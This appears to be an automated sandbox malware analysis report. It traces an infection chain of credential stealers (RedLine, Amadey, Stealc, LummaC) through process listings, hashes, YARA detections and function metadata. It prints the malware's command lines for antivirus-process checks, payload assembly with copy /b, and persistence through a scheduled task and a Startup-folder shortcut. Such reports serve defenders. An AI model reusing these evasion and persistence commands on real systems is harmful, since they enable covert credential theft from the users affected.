Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:44:08
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Roaming\6rxotqIg7H.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\6rxotqIg7H.exe"
Imagebase:	0xce0000
File size:	311'296 bytes
MD5 hash:	30F46F4476CDC27691C7FDAD1C255037
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000000.2724132947.0000000000CE2000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe, Author: Joe Security
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:44:10
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Imagebase:	0x1f0000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000000.2751658343.00000000001F1000.00000020.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000002.2763142147.00000000001F1000.00000020.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, Author: Joe Security
Antivirus matches:	Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:44:11
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Imagebase:	0x520000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.2761389171.0000000000521000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.2763337703.0000000000521000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:44:11
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Imagebase:	0x520000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.2762025152.0000000000521000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.2764100441.0000000000521000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:44:13
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0xce0000
File size:	192'000 bytes
MD5 hash:	7A02AA17200AEAC25A375F290A4B4C95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000002.3033783708.000000000168E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:44:21
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe"
Imagebase:	0xd50000
File size:	6'827'008 bytes
MD5 hash:	297FA8C27084D876F6699D121F9C06FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000015.00000002.2975464614.0000000001C7C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000015.00000002.2975908580.0000000001DE7000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000015.00000002.2975464614.0000000001B4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000015.00000002.2975464614.0000000001B4C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000015.00000002.2975464614.0000000001C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000015.00000003.2957476998.0000000001DE7000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000015.00000002.2975464614.0000000001BE4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:44:30
Start date:	31/08/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x490000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000016.00000002.3000690685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:44:31
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe"
Imagebase:	0x400000
File size:	10'481'152 bytes
MD5 hash:	304A5A222857D412CDD4EFFBB1EC170E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 62%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	09:44:46
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe"
Imagebase:	0x2b0000
File size:	9'697'280 bytes
MD5 hash:	366EB232CCB1D3D063E8074F8C4B529F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000018.00000003.3204266932.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000018.00000002.3327893982.00000000018D6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000018.00000003.3204266932.0000000001CCC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000018.00000002.3371228781.0000000001E19000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000018.00000003.3204266932.0000000001E19000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000018.00000002.3370673324.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000018.00000002.3371228781.0000000001CCC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000018.00000002.3371228781.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:44:49
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe"
Imagebase:	0x400000
File size:	1'411'961 bytes
MD5 hash:	046EBD7E0F619F33DE609EA3F126B0D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:44:50
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	09:44:50
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:44:50
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x4e0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:44:50
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xe90000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	09:44:51
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x4e0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:44:51
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0xe90000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	09:44:51
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 591950
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	09:44:51
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "BachelorRayPotentialBeats" Itsa
Imagebase:	0xe90000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	09:44:51
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:44:52
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
Wow64 process (32bit):	true
Commandline:	Shipment.pif E
Imagebase:	0x9d0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	09:44:52
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x6b0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	09:44:52
Start date:	31/08/2024
Path:	C:\Users\user\1000238002\Amadeus.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\1000238002\Amadeus.exe"
Imagebase:	0xe20000
File size:	435'200 bytes
MD5 hash:	CED97D60021D4A0BFA03EE14EC384C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000002.3378407711.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000000.3167830947.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\1000238002\Amadeus.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	09:44:53
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:44:54
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	09:44:54
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Imagebase:	0x270000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	09:44:54
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	09:44:54
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	09:44:55
Start date:	31/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Imagebase:	0x7ff74f3c0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	09:44:56
Start date:	31/08/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x490000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000002C.00000002.3330388313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	09:45:00
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Imagebase:	0x520000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002D.00000000.3244606985.0000000000521000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002D.00000002.3374733512.0000000000521000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	09:45:03
Start date:	31/08/2024
Path:	C:\Users\user\1000238002\Amadeus.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\1000238002\Amadeus.exe"
Imagebase:	0xe20000
File size:	435'200 bytes
MD5 hash:	CED97D60021D4A0BFA03EE14EC384C12
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002E.00000002.3312997597.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002E.00000000.3281580871.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	09:45:03
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000262001\385107.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000262001\385107.exe"
Imagebase:	0x400000
File size:	7'596'943 bytes
MD5 hash:	14A56F81287D1E037FC6405247C31D20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	09:45:07
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe
Imagebase:	0x400000
File size:	6'678'345 bytes
MD5 hash:	059A2BA5620F3F4B2316685ECFCD36BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 051F0C59 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

Anm@, xrefs: 051F0C93

Memory Dump Source

Source File: 00000000.00000002.2125571843.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_OmnqazpM3P.jbxd

Similarity

API ID:
String ID: Anm@
API String ID: 0-3861533204
Opcode ID: ef4548bb427ec55df83d33aa2bd88b6eb56fac431b2e7f75b52f31f1e739414f
Instruction ID: 80035852d0e4770f782a7853b283e5a7f31f2320bde65cccacb3d29a2d69f3b8
Opcode Fuzzy Hash: ef4548bb427ec55df83d33aa2bd88b6eb56fac431b2e7f75b52f31f1e739414f
Instruction Fuzzy Hash: 720126EF04C120BE7052C0867B589F69B9FF5CA63533289A3FA03C1503E3D54A492231

Function 051F0C77 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

Anm@, xrefs: 051F0C93

Memory Dump Source

Source File: 00000000.00000002.2125571843.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_OmnqazpM3P.jbxd

Similarity

API ID:
String ID: Anm@
API String ID: 0-3861533204
Opcode ID: 049e71a4ceb1fb652e0fe5e534f785e28527417451b022969d35e19b12493efa
Instruction ID: aacdba0c44df981965294d31a4ca48d63045c27a89f50ed1fc4e6ecdf06c2c3b
Opcode Fuzzy Hash: 049e71a4ceb1fb652e0fe5e534f785e28527417451b022969d35e19b12493efa
Instruction Fuzzy Hash: C5113AEF10C110AEA265D0615B5C6F26BDBE5DE6353328DA7FB07C5103E796864A0331

Function 051F0CA3 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

Anm@, xrefs: 051F0C93

Memory Dump Source

Source File: 00000000.00000002.2125571843.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_OmnqazpM3P.jbxd

Similarity

API ID:
String ID: Anm@
API String ID: 0-3861533204
Opcode ID: b649dd2cf1128c0310848232c86a4f79e5de126430e126687d96550ea521f5e4
Instruction ID: 1f409988156e99bf015c8d7e23bd76cab0d8030e2289444e1db17c6b0424cb1b
Opcode Fuzzy Hash: b649dd2cf1128c0310848232c86a4f79e5de126430e126687d96550ea521f5e4
Instruction Fuzzy Hash: E1014CEF18C264BE6062C0962B589F35BAFF4DB63433689A7FA43C1503E3954A495332

Function 051F0C33 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125571843.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_OmnqazpM3P.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847fd8ba63ccc23245a0d25baeb867d7b718e5cb3b8e17c96f9bbc3eb4a78415
Instruction ID: bcdd3afd2a34929e1200f9d6326193f783116d5af5f4b0222c3af9e52e571bce
Opcode Fuzzy Hash: 847fd8ba63ccc23245a0d25baeb867d7b718e5cb3b8e17c96f9bbc3eb4a78415
Instruction Fuzzy Hash: C2F028EF50C114AEB161C182379C6B6979BF6DB23533249A7FA03C5107EB92464A1336

Analysis Process: axplong.exePID: 4744, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2
Total number of Limit Nodes:	0

Executed Functions

Function 001DF753 Relevance: 1.3, APIs: 1, Instructions: 15
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 001DF75C

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9d53fcd9e14783c1c092f40565c25fbd9d9faa4ded48b16af6a0c4573fead926
Instruction ID: f47fe0fcb409a1d9a93781e6224eb12605685617ce04b7639e832d7217f49d35
Opcode Fuzzy Hash: 9d53fcd9e14783c1c092f40565c25fbd9d9faa4ded48b16af6a0c4573fead926
Instruction Fuzzy Hash: 4BE0BD7451D388DFD708AF10C8165BDBBF4FE12301F1A099ED8C24A252C3319AA5DB56

Function 001DF639 Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 001DF642

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a5103cfa4d68c9e46764afa6200ceca947ac8cab7d93a415f3184f674c209cd6
Instruction ID: 6f817e329bceeb759688b94279f3a7f97f169762e4b3e901036b9e5a3c76af2f
Opcode Fuzzy Hash: a5103cfa4d68c9e46764afa6200ceca947ac8cab7d93a415f3184f674c209cd6
Instruction Fuzzy Hash: B4D017B550C24ACFDB042F74800C2AD3AA0EF15311F22062AEC9686B90E7324D61CA1A

Non-executed Functions

Function 002A8761 Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H8/W, xrefs: 002A8796

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID: H8/W
API String ID: 0-2995775452
Opcode ID: 97ae38a12e58adf7ec5dfbbab38985766e01699f6f0cd8687d20f972b27eb704
Instruction ID: ab8f943c5e0278fb8e7c62b4867f428ce7ef314062807bf8808479a9e0417dc3
